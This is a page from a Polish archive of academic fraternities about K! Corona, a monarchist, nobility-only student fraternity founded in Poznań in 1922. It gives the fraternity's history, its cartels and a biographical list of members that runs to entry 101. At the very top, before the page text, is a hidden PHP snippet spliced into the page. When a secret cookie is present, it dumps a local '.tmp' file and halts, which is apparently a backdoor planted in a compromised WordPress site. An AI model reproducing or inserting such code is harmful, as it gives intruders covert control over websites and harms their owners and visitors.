if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Corona

Dekiel Unii - vide Poszukiwania. Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego “Corona”
Siedziba:
Poznań
Data powstania:
22 IX 1922 r.
Barwy:
biała – niebieska – pomarańczowa
Dewiza:
„Pro Patria et corona”, („Dla Ojczyzny i korony”)

Rys historyczny

Herb Corony, 1924 r.

Corona została założona przez młodych ziemian z Poznańskiego i Pomorza. Myślą przewodnią nowej korporacji miało być propagowanie idei monarchicznych. Od innych korporacji poznańskich odróżniała się także wybitnie elitarnym charakterem związanym z faktem, że warunkiem uzyskania członkostwa było posiadanie tytułu szlacheckiego. Pozostawała blisko związana towarzysko z inną poznańską korporacją o charakterze ziemiańskim - K! Primislavia.

Korporacja Corona, Poznań 1939 r.

Od dnia 22 IX 1922 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 22 IX 1922 r.). Kandydowała pod opieką K! Lechia W latach 1934-38 pozostawała poza strukturami Związku.

Zawarła kartele: dnia 1 III 1924 r. z K! Helania z Gdańska, dnia 12 V 1924 r. z K! Regia z Warszawy (wypowiedziany dnia 29 VI 1929), dnia 1 (5?) VI 1928 r. z K! Corolla z Krakowa.

Całkowita ustalona, niekompletna imienna lista członków korporacji obejmuje 151 nazwisk.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Corony obejmuje 151 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Geberhard Büllow, (rodzina kanclerza Rzeszy), odznaczony Krzyżem Walecznych
 2. Adam Belina-Brzozowski, (1908 - 1 lutego 1993 w Montrealu) c. 1927, student UP i WSH, ekonomista, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, sekretarz 1978-79

  Karol Belina-Brzozowski, 1939 r.

 3. Karol Belina-Brzozowski, ( - 16 kwietnia 1997 w Warszawie)

 4. Konstanty Belina-Brzozowski, ( - lata 50-te)
 5. Adam Bieliński, (18 sierpnia 1904 - 5 kwietnia 1988) herbu Szeliga, z Bielin w Sandomierskim, s. Antoniego Piotra i Marii z Jasieńskich, student prawa UJ, później student UP, w Krakowie członek Corolli, później Corony, prezes sem. zim. 1927/28, w czasie wojny obronnej 1939 w 9 Pułku Ułanów Małopolskich, adjutant wiceministra wojny gen. Głuchowskiego, ostatni dowódca 15 Pułku Ułanów Poznańskich Wielkopolskiej Dywizji Kawalerii w ramach Armii “Poznań”, płk WP, po wojnie na emigracji w Wielkiej Brytanii, odznaczony m.in. Krzyżem Virtuti Militarii i Krzyżem Walecznych
 6. Jerzy Bielski, sekretarz 1930
 7. Józef Franciszek Emanuel Innocenty Maria Bocheński, (30 sierpnia 1902 w Czuszowie k. Miechowa - 8 lutego 1995 we Fryburgu Szwajcarskim) brat Adolfa i Aleksandra (Gedania Leopoliensis), absolwent Gimnazjum we Lwowie, uczestnik wojny polsko-rosyjskiej 1920, student prawa UJK 1922-26, student ekonomii UP 1922, olderman 1923, działacz akademicki, prezes Organizacji Młodzieży Monarchistycznej, w 1926 wstąpił do seminarium duchownego, a w 1927 do nowicjatu dominikańskiego (imię zakonne Innocenty), studiował we Fryburgu i Rzymie, historyk logiki, filozof, sowietolog, habilitacja UJ 1938, w wojnie obronnej 1939 kapelan 80. Pułku Piechoty, kapelan w II Korpusie PSZ na Zachodzie, logik, po wojnie na emigracji w Szwajcarii, od 1945 prof. Uniwersytetu we Fryburgu, rektor 1964-66, kierownik Instytutu Europy Wschodniej we Fryburgu, red. czasopisma “Studies in Soviet Thought” i serii wydawniczej “Sovietica”

  [Źródła (poza wskazanymi poniżej spisu członków): Robert Zadura, Saga rodu Bocheńskich (O przodkach, rodzinie i młodości o. Józefa Marii Bocheńskiego), Kraków 2013]

 8. Wacław Bylina, prezes 1925, działacz Młodzieży Wszechpolskiej
 9. Witold Celiński,

  Michał Chełkowski, 1936 r.

 10. Michał Chełkowski, (8 października 1912 w Śmiełowie - 14 grudnia 2003 w Poznaniu) wychowanek Gimnazjum im. Adama Mickiewicza w Poznaniu, absolwent Wydziału Rolno-Leśnego UP, akt. 1933-35, olderman 1933-1935, uczestnik kampanii wrześniowej 1939, działacz społeczny, odznaczony Krzyżem AK, pochowany na Cmentarzu Junikowskim w Poznaniu

 11. Zygmunt Lucjan Chłapowski, (29 listopada 1909 - 24 marca 1949) herbu Dryja, s. Tadeusza i Zofii ze Zdzieńskich, oficer AK w Rzeszowskim, zmarł na skutek przesłuchań UB
 12. Mieczysław Chołoniewski, (1905-1977) brat Bolesława (Regia), student UP 1924-25, c. 1924/25 Corona, student UW 1925-33, c. 1925 Regia, akt. 1925-33, sekretarz sem. let. 1927/28, sekretarz sem. zim. 1928/29, prezes sem. zim. 1932/33 (jako filister), wiceprezes WKM-u sem. let. 1931/32, prawnik, adwokat
 13. Stefan Chosłowski (?),
 14. Ignacy Chrzanowski, członek Lechii (?), akt. 1922, założyciel Corony (?), prezes 1922, wiceprezes Młodzieży Monarchistycznej, sekretarz Bratniej Pomocy Studentów UP 1922/23, prof. (?)
 15. Józef Chrzanowski, z Poznania, dr
 16. Andrzej Ciechomski, (12 kwietnia 1918 in Rutkowice -1978 w Argentynie) herbu Wąż, s. Jerzego (Arkonia) i Magdaleny z Mikulskich, w wojnie obronnej 1939 porucznik kawalerii, w obozie jenieckim w Murnau 1939-45, po wyzwoleniu w PSZ na Zachodzie, w 1947 wyemigrował do Argentyny, kierownik budów linii energetycznych w Argentynie, przeszedł na emeryturę w 1974

  Marceli hr Czarnecki, 1939 r.

 17. Marceli hr Czarnecki, (15 stycznia 1919 - 29 września 1939 pod Janowem Lubelskim) herbu Prus (III), s. Stanisława i Eleonory z Komierowskich, mieszkał w Gogolewie w pow. gostyńskim, w wojnie obronnej w 17 Pułku Ułanów Wielkopolskich w ramach Armii “Poznań”, poległ w walkach

  Józef Czarnowski, 1939 r.

 18. Józef Czarnowski,

 19. Andrzej Maria ks. Czetwertyński, (16 września 1911 w maj. Żołudek pow. Grodno - 25 września 1939 w maj. Skidel pow. Grodno) s. Ludwika Rudolfa i Róży z ks. Radziwiłłów, bratanek Seweryna, brat stryjeczny Stefana (obaj Arkonia), uczeń Gimnazjum im. Bolesława Chrobrego w Pszczynie, student Wydziału Rolno-Leśnego UP, akt. 1933-35, prezes 1934 i sem. let. 1934/35, rozstrzelany wraz z żoną w rodzinnym majątku przez NKWD

  Jerzy Dąbski, 1939 r.

 20. Jerzy Dąbski, ( - 1946)

 21. Józef Dąmbski, z Watycza [być może Józef Dąmbski (1902-1931) s. Aleksandra i Marii z hr. Wodzickich]
 22. Tadeusz Dembiński, (1909? - 1984) wiceprezes 1930
 23. Jerzy Doria-Dernałowicz, student Wydziału Rolno-Leśnego [prawd. Jerzy Doria-Dernałowicz (1918-1940) herbu Lubicz, s. Stanisława i Wandy z d. Doria-Dernałowicz, prawd. brat stryjeczny Władysława (Sarmatia)]
 24. Józef Domański, sekretarz sem. zim. 1927/28 [prawd. Józef Domański (1905-1988) herbu Larysza, s. Zenona i Janiny z Domańskich, brat Adama i Janusza (obaj Arkonia), brat stryjeczny Tadeusza (Arkonia)]
 25. Marian Doskowski, ( - wrzesień 1939) student Wydziału Prawno-Ekonomicznego UP, olderman sem. let. 1925/26, rozstrzelany przez Niemców

  Jerzy Drwęski, 1939 r.

 26. Jerzy Drwęski, (1911 - 22 grudnia 1995 w Poznaniu) s. Jarogniewa (prezydenta Poznania), olderman sem. zim. 1938/39, c. 1931, ekonomista, bankowiec

 27. Jan Frydrychowicz, ( - styczeń 1998 w Kanadzie) po wojnie przez wiele lat na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu
 28. Jerzy Fudakowski, (18 września 1912 - 8 listopada 1995) herbu Dołęga, s. Kazimierza i Marii z Kicińskich, bratanek Leona (Arkonia), student Wydziału Prawno-Ekonomicznego UP, akt. 1933-35, skarbnik 1934, sekretarz sem. let. 1934/35
 29. Jan Gąsiorowski, z Poznania
 30. Tadeusz Goetzendorf-Grabowski, z Lechlina [prawd. Tadeusz Goetzendorf-Grabowski (1883-1944) herbu Zbiświcz, s. Bolesława i Marii z Garczyńskich, ostatni właściciel maj. Lechlin]

  Zdzisław Gordziałkowski, 1939 r.

 31. Zdzisław Gordziałkowski,

 32. Antoni Gościmski, (4 kwietnia 1912 w Kobylnikach w pow. inowrocławskim - 26 lipca 2012 w Warszawie) s. Zygmunta i Marii z Plucińskich, absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu 1930, student i absolwent 1934 prawa UP, c. 1931, adwokat 1945, żołnierz wojny obronnej 1939, uciekł w niewoli sowieckiej, od 1943 student tajnego Seminarium Duchownego w Warszawie, po upadku Powstania Warszawskiego wywieziony na roboty do Niemiec, po wojnie w Wyższym Seminarium Duchownym we Włocławku, święcenia 1948, pracował jako wikariusz w parafiach diecezji włocławskiej: Lubień, Podwyższenia Krzyża Św. w Kole, św. Bartłomieja w Koninie, Wszystkich Świętych w Sieradzu oraz sanktuarium św. Józefa w Kaliszu, w 1960 na prośbę prymasa Wyszyńskiego został inkardynowany do archidiecezji warszawskiej, od 1961 był rezydentem w parafii Chrystusa Króla na Targówku, sędzia Sądu Metropolitalnego Warszawskiego 1961-1988 oraz radca prawny Kurii Warszawskiej, doktorat z prawa kanonicznego ATK, wykladowca Seminarium Duchownego w Warszawie oraz Akademii Teologii Katolickiej 1973-1988, kanonik
 33. Antoni Grabianka, (1913-1963) absolwent Akademii Handlowej
 34. Stanisław Grabowski, sekretarz 1923, sekretarz Młodzieży Mocarstwowej 1923, red. “Przeglądu Akademickiego”
 35. Feliks Hebda-Grabski, (14 sierpnia 1905 w Kurcewie - 1940 w Charkowie) s. Władysława i Jadwigi z Oświecimskich, student i absolwent rolnictwa UP, por. rez., przydzielony do 4 Pułku Artylerii Ciężkiej, uczestnik wojny obronnej 1939, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 36. Włodzimierz Hugo Haack, (20 października 1904 - 3 stycznia 1991) s. Artura i Ireny z d. Bojańczyk
 37. Eryk Haller, (1906 w Lwowie - ) s. Józefa (generała, Baltia, Sparta), brat stryjeczny Cezarego (Jagiellonia), członek Kujawji, członek Komisji Rewizyjnej Cieszyńskiego Koła Międzykorporacyjnego 1925/26, wiceprezes sem. zim. 1930/31 Corona
 38. Henryk Hilchen, ( - 1933) zginął tragicznie w katastrofie samolotowej pod Środą Wielkopolską
 39. Kazimierz Janisławski, (20 lutego 1900 - lipiec 1940) herbu Leliwa, s. Ksawerego i Kazimiery z Moskalewskich, brat Tadeusza (Corona) i Jerzego (Kujawja), brat stryjeczny Witolda (Corona)
 40. Tadeusz Janisławski, (1902 - 4 sierpnia 1926) herbu Leliwa, s. Ksawerego i Kazimiery z Moskalewskich, brat Kazimierza (Corona) i Jerzego (Kujawja) brat stryjeczny Witolda (Corona), sekretarz 1922, członek Rady Naczelnej Bratniej Pomocy Studentów UP 1922/23

  Witold Janisławski, 1939 r.

 41. Witold Janisławski, (1913-1981) herbu Leliwa, s. Józefa i Wandy z Chrzanowskich, stryjeczny brat Kazimierza i Tadeusza (obaj Corona) oraz Jerzego (Kujawja), sekretarz sem. zim. i sem. let. 1938/39

 42. Władysław Jaroszyński, student Wydziału Prawno-Ekonomicznego UP, akt. 1935 [być może Władysław “Dino” Jaroszyński, (6 lutego 1915 - 1940 w Charkowie) z Jaroszynki, herbu własnego, s. Władysława i Marii ze Złotnickich, w niewoli sowieckiej, zamrodowany przez NKWD]
 43. Konstanty Jaźwiński, student Wydziału Rolno-Leśnego UP, akt. 1933-35, wiceprezes 1933/34
 44. Witold Jaźwiński,
 45. Janusz Jodko-Narkiewicz, (po 1907 - 1944 pod Falaise w Normandii) brat Stanisława (Corona), działacz Związku Kresów Wschodnich, prezes Młodzieży Monarchistycznej w Poznaniu 1926/27
 46. Stanisław Jodko-Narkiewicz, (1907? - 1942 w Auschwitz) brat Janusza (Corona), sekretarz sem. let. 1925/26 oraz sem. zim. 1926/27, prezes 1930/31, działacz Młodzieży Monarchistycznej i Związku Kresów Wschodnich, dyplomata, oficer artylerii przeciwlotniczej

  Adam Karwowski, ok. 1930 r.

 47. Adam Karwowski, (22 marca 1873 w Ostrowie Wlkp. - 13 września 1933 w Poznań) s. Stanisława i Marii z Pstrokońskich, ojciec Stanisława (Corona), studiował med. W Würzburgu, Lipsku, Freiburgu, Monachium, Berlinie i Insbruku, dr med. 1896, dermatolog i wenerolog, działacz społeczny, m.in. kierownik Towarzystwa Śpiewaczego “Lutnia”, w czasie wojny w armii niemieckiej, mjr, a następnie ppłk WP 1918-21, kierownik wojskowego szpitala wenerycznego w Poznaniu, prezes Wydziału Lekarskiego PTPN, ordynator Oddziału Dermatologicznego Szpitala Miejskiego w Poznaniu, od 1921 wykładowca UP, habilitacja 1922, od 1923 prof. nadzw. i kierownik Kliniki Dermatologicznej UP, dziekan Wydziału Medycznego UP, autor ponad 50 prac naukowych, red. “Nowin Lekarskich”, wiceprezes i członek honorowy Polskiego Towarzystwa Dermatologicznego, Filister kooptowany (honorowy ?) Corony

  Stanisław Karwowski, ok. 1930 r.

 48. Stanisław Ignacy Antoni Karwowski, (9 grudnia 1906 w Poznaniu - 1940 w Miednoje) s. Adama (Corona) i Anny z Łebińskich, absolwent Gimnazjum Jana Kantego 1925, student i absolwent 1932 med. UP, wiceprezes sem. zim. 1927/28, prezes 1929/30 i sem. zim. 1930/31, dr med., laryngolog, pracownik naukowy UP, por. rez. służby zdrowia, w wojnie obronnej 1939 w VII Szpitalu Okręgowym w Armii “Poznań”, w niewoli sowieckiej w Ostaszkowie, zamordowany przez NKWD

  Kazimierz Kiciński, 1939 r.

 49. Kazimierz Kiciński, (1918 - 1990 w Los Angeles) s. Adama i Józefy z d. Dzierżykraj-Morawska, po wojnie na emigracji w Stanach Zjednoczonych

 50. Bohdan Kiełczewski, (1905 - 8 października 1939 w Radomiu) s. Mariana i Marii z Zunderlandów, brat Zygmunta (Corona), student i absolwent (inż. rolnik) Wydziału Rolno-Leśnego UP, wiceprezes sem. zim. 1926/27, 1926/27, por. 10 pułku ułanów, w wojnie obronnej 1939 ranny w walce z Niemcami, zmarł w szpitalu w Radomiu
 51. Zygmunt Kiełczewski, s. Mariana i Marii z Zunderlandów, brat Bohdana (Corona), olderman sem. zim. 1926/27
 52. Konstanty Kietlicz-Rayski, delegat Corony na XIII Zjazd ZPKA w 1937
 53. Andrzej Kołaczkowski, student Wydziału Humanistycznego UP
 54. Władysław Komar, (11 stycznia 1910 w maj. Rogówek k. Poniewieża - 20 czerwca 1944 w maj. Podbrzezie k. Wilna) s. Konstantego Komara i Katarzyny Komar, szwagier Stefana Jasieńskiego (Arkonia), ojciec Władysława Komara (kulomiota i mistrza olimpijskiego z Monachium) student UP, inż. rolnik, członek ZWZ AK - okręg wileński, reprezentant Litwy Kowieńskiej w biegu na 110 metrów przez płotki, w czasie okupacji członek ZWZ-AK, zamordowany przez Litewskie Siły Pomocnicze w maj. własnym Rogówek
 55. Andrzej Kozłowski, z Warszawy
 56. Janusz Kozłowski, z Śmiechowa, wiceprezes 1922, sekretarz Młodzieży Wszechpolskiej 1922/23
 57. Zbigniew (Leon Zbigniew) Kretkowski, (27 kwietnia 1912 - 21 czerwca 1943) herbu Dołęga, s. Stefana Zygmunta (Arkonia) i Marii z Malinowskich, brat stryjeczny Stanisława (Kujawja), ziemianin, uczestnik wojny obronnej 1939 w formacjach ułańskich, ewakuował się i przez Litwę, Łotwę i Skandynawię dostał się do Francji, żołnierz Wojska Polskiego we Francji, po upadku Francji i przeszkoleniu lotniczym w Anglii i Kanadzie pilot-nawigator, lotnik 300 Dywizjonu Bombowego Ziemi Mazowieckiej, zginął w katastrofie samolotu bombowego typu “Wellington”, autor wspomnień “Z kujawskiego dworu pod skrzydła RAF 1939-1943″ (Warszawa 2006)
 58. Marcin Krzymuski, (1908-1979) student Wydziału Rolno-Leśnego UP
 59. Stanisław Kurnatowski, (13 sierpnia 1871 - 18 maja 1965) s. Stanisława i Leonory z hr. Potworowskich, brat Zygmunta (prawd. Corona), ziemianin, właściciel Pożarowa, radca Ziemstwa Kredytowego w Poznaniu, Filister kooptowany (honorowy ?) Corony
 60. Zygmunt hr. Kurnatowski, z Gościeszyna [prawd. Zygmunt hr. Kurnatowski (13 sierpnia 1858 w Pożarowie - 7 października 1936 w Gościeszynie) s. Stanisława i Eleonory i hr. Potworowskich, brat Stanisława (Corona), Filister kooptowany (honorowy ?) Corony]
 61. Władysław Leszczyński, z Gołębiowa, s. Zygmunta (Arkonia), działacz monarchistyczny
 62. Stanisław Lipski,

  Stanisław Lubomirski, 1939 r.

 63. Stanisław Lubomirski,

 64. Bolesław Lutomski, (7 lutego 1905 - 1974) s. Stefana i Stefani z d. Brzeska, prawd. Powołany do służby w 7 Dywizjonie Artylerii Konnej i skierowany na kurs podchorążych rezerwy w Śremie, studiował w Poznaniu, awansowany na ppor rez. Art.. Ze starzeństwem 1930, przypisany do 7 Dywizjonu Artylerii Konnej w Poznaniu, w wojnie obronnej 1939 oficer żywnościowy 3 dywizjonu 17 Pułku Artylerii Lekkiej

  [Źródła (poza wskazanymi poniżej spisu członków): Paweł Janicki, www.7dak.pl, sierpień 2013]

 65. Władysław Lutostański, (30 czerwca 1912 - 2 października 1944 w Warszawie) herbu Jelita, s. Wacława i Marii z Dąmbskich, brat Jerzego (Jagiellonia), student prawa na UP, żołnierz w kampanii wrześniowej, zmarł z ran odniesionych w powstaniu warszawskim w szpitalu powstańczym
 66. Stefan Łebiński, (1909-1989) prezes sem. let. 1930/31
 67. Roman Łuniewski, [prawd. Roman Łuniewski (1906 - ), herbu Łukocz, s. Gabriela i Zofii z Podhoreckich, brat Gabriela (Patria)]
 68. Edmund Łyskowski, skarbnik 1922, sekretarz Młodzieży Monarchistycznej 1922

  Raul Małachowski, 1936 r.Raul Małachowski, 1939 r.

 69. Raul Małachowski, (1 stycznia 1916 w Helsinkach - 7 września 2014 w Santiago de Chile) s. generała Stanisława i szwedki Anny Lisy z d. Petersen, po I wojnie światowej mieszkał z rodziną w Łodzi, absolwent Gimnazjum Klasycznego im. M. Kopernika w Łodzi oraz Szkoły Podchorążych Kawalerii w Grudziądzu, student Wyższej Szkoły Handlowej, akt. 1938-39, gospodarz sem. zim. 1938/39, uczestnik wojny obronnej 1939, m.in. udział w obronie Modlina, w czasie okupacji aktywny w tajnym Czerwonym Krzyżu, aresztowany przez Gestapo w 1943, niemal rok więziony w więzieniu na Sterlinga i na Radogoszczu, a następnie osadzony w obozie KL Mauthausen-Gusen (Gusen II), po wyzwoleniu w 1945 wcielony do II Korpusu PSZ we Włoszech, po rozwiązaniu Korpusu zamieszkał w Belgii, a od 1951 w Chile, zwiazany ze światem kultury, dyrektor artystycznym i scenograf Opera Real de Amberes w Belgii, wykonywał murale i dekoracje m.in. w Hotelu Carrera i Teatrze Mariola w Santiago, hotelach O’Higgins, San Martin i Miramar w Viña del Mar oraz Hotelu Prat w Valparaiso, jego ekspozycje prezentowano w Paryżu, Szwajcarii i Polsce, w latach 60-tych XX wieku założył Teatro de la Costa w Valparaiso, był także dyrektorem kawiarni artystycznej „Gato Negro” w Santiago, jego prace malarskie obejmują: cykl obrazów olejnych i akwarel przedstawiających życie nocne portowe Valparaiso; szkice o tematyce obozowej i wojennej, a także portrety, m.in. polskich bohaterów narodowych T. Kościuszkę, A. Mickiewicza, F. Chopina, J. Piłsudskiego), był Przedstawicielem Rządu Rzeczypospolitej na Uchodźstwie w Chile 1989-90, w losach Raula Nałęcz-Małachowskiego w 1998 Zygmunt Skonieczny nakręcił film dokumentalny pt. „Człowiek dwóch kontynentów”, autor wspomnień o takim tytule, odznaczony m.in. Krzyżem Polonia Restituta 1990 (przez władze na Uchodźstwie) oraz Krzyżem Komandorskim Orderu Odrodzenia Polski 1992, spocznie w symbolicznym grobie swojej matki Anny Lisy Małachowskiej z Petersenów na Cmentarzu przy ul. Ogrodowej w Łodzi

 70. Stanisław Michałowski, student Wydziału Prawo-Ekonomicznego UP
 71. Edmund Mieczkowski, (24 lipca 1910 - 9 listopada 1939) s. Stanisława i Kazimiery z Moszczeńskich, brat Andrzeja (Helania), studia rolnicze w Lozannie, aresztowany przez Niemców w swoim maj. w Srebrnej Górze pow. Żnin jako zakładnik (?), następnego dnia rozstrzelany
 72. Leszek Mieczkowski, (1903 - 17 lipca 1969 w Kołobrzegu) s. Wacława (Corona) i Władysławy z Działowskich, herbu Zagłoba, student Wydziału Rolno-Leśnego UP, właściciel maj. Niedźwiedź pow. Wąbrzeźno, w czasie okupacji w Łęcznej pow. Lublin, po wojnie kierownik, później inspektor PGR w woj. koszalińskim
 73. Stanisław Mieczkowski, z Poznania [prawd. ojciec Andrzeja (Helania) i Edmunda (Corona)]
 74. Wacław Mieczkowski, z Niedźwiedzia, ojciec Leszka (Corona)
 75. Tadeusz Mittelstaedt,

  Andrzej Mlicki, 1939 r.

 76. Andrzej Mlicki, ( - 1943/44) zginął w wypadku [być może Andrzej Mlicki (ok. 1920 - 1941), herbu Dołęga, s. Józefa (prawd. Corona) i Janiny z Chrzanowskich]

 77. Walenty Modlibowski, (1908-1985) student Wydziału Rolno-Leśnego UP
 78. Krzysztof Morawski, (25 czerwca 1903 - 5 stycznia 1981) herbu Drogosław, s. Kazimierza i Marii z Chłapowskich
 79. Stanisław Moskalewski, (28 kwietnia 1876 w Sieprawkach k. Garwolina - 6 września 1936 w Poznaniu) ze zubożałej rodziny szlacheckiej, s. Feliksa, polityk Narodowej Demokracji, działacz państwowy i społecznik, wojewoda lubelski 1919-26, równolegle nadzwyczajny komisarz oszczędnościowy przy Prezesie Rady Ministrów 1923-26, zdymisjonowany ze stanowiska wojewody po przewrocie majowym, od 1928 prezes Polskiego Czerwonego Krzyża w Poznaniu, Filister kooptowany (honorowy) Corony ?, Filister honorowy Coronii, odznaczony Krzyżem Komandorskim OOP 1922
 80. Tadeusz Moszczeński, (12 stycznia 1882 w Stępuchowie - 11 stycznia 1932 w Stępuchowie) ze Stępuchowa, herbu Nałęcz, s. Adolfa i Anny z Moszczeńskich, kuzyn Jana i Ignacego (Primislavia), ojciec Adolfa (Primislavia), absolwent Gimnazjum Marii Magdaleny i Uniwersytetu w Monachium, dr praw i ekonomii, Filister kooptowany (honorowy ?) Corony [Źródła (poza wskazanymi poniżej spisu członków): relacja Marii Okińczyc]

  Roch Ozdowski, 1939 r.

 81. Roch Ozdowski,

 82. Zbigniew Paliszewski, (22 sierpnia 1910 w Poznaniu - 25 listopada 1957 w Londynie) herbu Abdanek, s. Wacława i Anny z d. Striese, brat Włodzimierza (Primislavia), student i absolwent prawa UP, akt. 1935, ppor. rez., w wojnie obronnej 1939 por. w 15 Pułku Ułanów Poznańskich w Armii “Poznań”, jeniec oflagu w Woldenbergu, po wyzwoleniu wyjechał do Wielkiej Brytanii, pozostał na emigracji
  [Źródła (poza wskazanymi poniżej spisu członków): relacja Mirosława Paliszewskiego]

 83. Tadeusz Parczewski, student Wydziału Prawno-Ekonomicznego UP, sekretarz sem. zim. oraz sem. let. 1930/31, działacz Polonii w Paryżu
 84. Zygmunt Pluciński, (12 lutego 1882 w miejsc. Strzępiń - 15 grudnia 1933 w Lusówku) herbu Odrowąż, s. Kazimierza i Bronisława z Trąmpczyńskich, powstaniec wielkopolski, tworzył kompanię z okręgu Tarnowsko-Rokietnickiego, prezes Koła Filistrów 1924, pochowany na cmentarzu w Lusowie
 85. Jerzy Pniewski, olderman 1925
 86. M. Podczaski, prezes sem. zim. 1924/25, działacz Młodzieży Monarchistycznej
 87. Polędzki,
 88. Roman Janta- Połczyński, (14 grudnia 1891 w Żabiczynie - 22 marca 1984 w Sopocie) herbu Bończa, s. Romana i Anny z Wałdowskich, bratanek Władysława (Corona), ziemianin, właściciel Michorowa i Montek w pow. szumskim, Filister kooptowany (honorowy ?) Corony
 89. Władysław Janta- Połczyński, (23 lutego 1854 w Komorzy Wielkiej k. Tucholi - 12 lutego 1946 w Nider Amstadt w Niemczech) herbu Bończa, s. Stanisława i Anieli z Grąbczewskich, stryj Romana (Corona), właściciel Zakrzewa z Tumidajem i Redgoszczy, Filister kooptowany (honorowy ?) Corony, pochowany w Chomiąży Szlacheckiej

  Bohdan Powidzki, 1935 r.

 90. Bohdan Powidzki (Sternberg Powidzki), (2 listopada 1915 w Poznaniu - (prawd. 5 lub 8.) sierpień 1944 w Warszawie) s. Mieczysława (architekta) i Stanisławy z d. Mielęcka, brat Jana (Corona), uczęszczał Gimnazjum Marii Magdaleny w Poznaniu, harcerze w poznańskiej Drużynie im. Józefa Bema, student Wydziału Rolno-Leśnego, a później prawd. w Wyższej Szkole Inżynierskiej Wawelberga, walczył jako dowódca plutonu łączności w stopniu ppor. w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskiej Brygady Kawalerii w Armii Poznań, brał udział w bitwie nad Bzurą, ranny pod Laskami w Puszczy Kampinowskiej, przedostał się do Warszawy, prawd. zaangażowany w działalność konspiracyjną, poległ w Powstaniu Warszawskim, kawaler, bezdzietny, nie ma grobu [Źródła (poza wskazanymi poniżej spisu członków): relacja stryjecznego wnuka Grzegorza Drzycimskiego]

  Jan Powidzki, prawd. 1935-38.

 91. Jan Powidzki (Sternberg Powidzki), (15 czerwiec 1905 w Poznaniu - 14 stycznia 1950 w Szczecinie) s. Mieczysława (architekta) i Stanisławy z Mielęckich, brat Bohdana (Corona), akt. 1925-26, prawnik, adwokat, więzień KL Auschwitz, pochowany na Cmentarzu Sołackim przy ul. Lutyckiej w Poznaniu [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuka Grzegorza Drzycimskiego]

 92. Ignacy Prądzyński, (5 marca 1907 - września 1939 pod Łomiankami) herbu Grzymała, s. Kazimierza i Jadwigi z d. Daszewska, bratanek Józefa (Baltia), brat Andrzeja (Kujawja), poległ pod Łomiankami
 93. Aleksander Przeździecki,
 94. Tadeusz Racięcki, ze Słomkowa
 95. hr. Roger Adam Raczyński, (8 grudnia 1889 w Warszawie - 10 listopada 1945 w Atenach) s. Edwarda i Róży z Potockich Krasińskiej, absolwent Gimnazjum im Jana III Sobieskiego w Krakowie, student rolnictwa w Lipsku i malarstwa w Monachium, ziemianin, polityk konserwatywny, dyplomata, od 1926 związany z obozem sanacyjnym, prezes BBWR w Poznaniu, prezes Związku Pracy Mocarstwowej, wojewoda poznański 1929-34, wiceminister rolnictwa 1934-36, ambasador RP w Rumunii 1938-40 oraz przy rządzie greckim 1942-45, Filister kooptowany (honorowy ?) Corony, Filister honorowy Panslavii oraz Palestrii
 96. Antoni Radoński, z Poznania, herbu Jasieńczyk, s. Zygmunta i Heleny ze Stablewskich, brat Józefa (prawd. Primislavia), Filister kooptowany (honorowy ?) Corony
 97. Stanisław Radoński, z Poznania, Filister kooptowany (honorowy ?) Corony

  Zbigniew Radziszewski, lata 30-te.

 98. Zbigniew Radziszewski, (28 stycznia 1905 w Ostrzeszowie - 1940 w Katyniu), s. Stanisława i Michaliny z Marwegów, absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu, student i absolwent 1927 prawa UP, sekretarz 1925, sekretarz Związku Seniorów 1939, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1928, ppor. rez., po studiach asesor w Sądzie Grodzkim w Poznaniu, w 1932 otworzył kancelarię adwokacką pełniąc jednocześnie obowiązki radcy prawnego Poznania, w wojnie obronnej 1939 w 7 Pułku Artylerii Przeciwlotniczej, w niewoli sowieckiej w obozie w Kozielsku, zamordowany przez NKWD, pośmiertnie awansowany do stopnia porucznika

 99. Roman Rekowski,

  Józef Robakowski, prawd. lata studiów

 100. Józef Bolesław Robakowski, (10 sierpnia 1898 w Szpikowie na Podolu - 27 marca 1938 w Toruniu) herbu Ratułd, z maj. Pruski, s. Józefa (Welecja, dyrektora cukrowni) i Emilji Zietman (Łotyszki), w listopadzie wstąpił jako ochotnik do WP, brał udział w obronie Lwowa i walczył na froncie litewsko-białoruskim, w wojnie 1920 służył w Pułku Ułanów Zaniemieńskich, przeniesiony do rezerwy 18 października 1921 w stopniu ppor. art. konnej, student ekonomii 1921-23, inicjator i założyciel Corony, wiceprezes 1922, prezes 1923, wielokrotny prezes Młodzieży Monarchistycznej, członek Rady Naczelnej oraz sekretarz generalny ZG Organizacji Monarchistycznych, zastępca starosty grodzkiego w Bydgoszczy oraz powiatowego w Wyrzysku, Świeciu, Tucholi 1930-32, w dziale organizacji Polaków z zagranicy w Warszawie 1932-34, radca handlowy w Antwerpii 1934-36, a następnie wicestarosta bydgoski, od 1937 starosta w Sępólnie, pochowany w grobie rodzinnym na Starych Powązkach w Warszawie (166/5/30) [Źródła (poza wskazanymi poniżej spisu członków): Dziennik Bydgoski z 14 XI 1937, relacja bratanka Andrzeja Robakowskiego]

 101. Tadeusz Rogala-Kaczorowski, (1911 - ) c. 1935, ziemianin, właściciel Pamiątkowa (woj. poznańskie), po wojnie w Australii
